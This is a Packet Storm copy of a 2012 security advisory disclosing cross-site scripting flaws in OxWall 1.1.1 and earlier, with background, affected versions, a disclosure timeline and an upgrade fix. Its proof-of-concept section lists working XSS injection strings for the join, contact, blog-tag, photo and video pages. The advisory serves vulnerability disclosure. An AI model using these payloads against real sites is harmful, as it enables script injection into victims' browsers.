Lucene search

K
packetstormAung KhantPACKETSTORM:109994
HistoryFeb 21, 2012 - 12:00 a.m.

OxWall 1.1.1 Cross Site Scripting

2012-02-2100:00:00
Aung Khant
packetstormsecurity.com
173

0.036 Low

EPSS

Percentile

91.7%

`1. OVERVIEW  
  
OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.  
  
  
2. BACKGROUND  
  
Oxwall is a free open source software package for building social  
networks, family sites and collaboration systems. It is a flexible  
community website engine developed with the aim to provide people with  
a well-coded, user-friendly software platform for social needs. It is  
easy to set up, configure and manage Oxwall while you focus on your  
site idea. We are testing the concept of free open source community  
software for complete (site,sub-site setups) and partial  
(widgets,features) community and collaboration solutions for companies  
and individuals.  
  
  
3. VULNERABILITY DESCRIPTION  
  
Multiple parameters were not properly sanitized, which allows attacker  
to conduct Cross Site Scripting attack. This may allow an attacker to  
create a specially crafted URL that would execute arbitrary script  
code in a victim's browser.  
  
  
4. VERSIONS AFFECTED  
  
1.1.1 and lower  
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
URL: http://localhost/Oxwall/join  
  
Injected Attack String: '"><script>alert(/XSS/)</script>  
Method: HTTP POST  
Vulnerable Parameters: captchaField, email, form_name ,password  
,realname ,repeatPassword ,username  
  
------------------------------------------------------------------------------------  
  
URL: http://localhost/Oxwall/contact  
  
Injected Attack String: '"><script>alert(/XSS/)</script>  
Method: HTTP POST  
Vulnerable Parameters: captcha, email, form_name ,from , subject  
------------------------------------------------------------------------------------  
  
URL: http://localhost/Oxwall/blogs/browse-by-tag?tag=%27%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E  
Vulnerable Parameter: tag  
  
----------------------------------------------------------------------------  
  
Vulnerable Parameter: RAW-URI  
  
http://localhost/Oxwall/photo/viewlist/tagged/><img src=xs onerror=alert('XSS')>  
  
http://localhost/Oxwall/photo/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=  
  
http://localhost/Oxwall/video/viewlist/%22style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22onmouseover=alert%28%27XSS%27%29;%22x=  
  
  
6. SOLUTION  
  
Upgade to the latest version of Oxwall.  
  
  
7. VENDOR  
  
Oxwall Foundation  
http://www.oxwall.org/  
  
  
8. CREDIT  
  
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2011-06-09: notified vendor  
2012-02-20: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/%5BOxWall_1.1.1%5D_xss  
Oxwall Home Page: http://www.oxwall.org/  
  
  
#yehg [2012-02-20]  
`

0.036 Low

EPSS

Percentile

91.7%